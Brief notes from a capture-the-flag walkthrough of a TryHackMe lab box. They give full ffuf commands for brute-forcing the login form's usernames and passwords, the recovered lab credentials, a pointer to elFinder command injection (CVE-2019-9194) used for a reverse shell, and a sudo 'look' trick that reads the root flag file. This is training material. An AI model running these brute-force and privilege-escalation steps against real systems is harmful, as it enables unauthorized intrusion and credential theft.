THM lookup
NMAP
HTTP SSH
HTTP goes immediately to a login page #### FFUF fuzzing username >ffuf -u ‘http://lookup.thm/login.php’ -H ‘Content-Type: application/x-www-form-urlencoded’ -X POST -d ‘username=FUZZ&password=test’ -w /usr/share/seclists/Usernames/Names/names.txt -mc all -ic -fs 74 -t 100
Found: jose, admin
FFUF fuzzing password
ffuf -u ‘http://lookup.thm/login.php’ -H ‘Content-Type: application/x-www-form-urlencoded’ -X POST -d ‘username=jose&password=FUZZ’ -w /usr/share/wordlist/rockyou.txt -mc all -ic -fs 74 -t 100
Password: password123
elFinder CVE-2019-9194
version: 2.1.47
CVE-2019-9194 - command injection in PHP
Reverse shell with msfconsole
We find the user think in /home/think/. However, user.txt cannot be readed.
think credentials
user: think
pw: josemario.AKA(think)
sudo -l
Shows that ‘look’ command has root priviledge
look ’’ /root/root.txt
throws out root flag that easy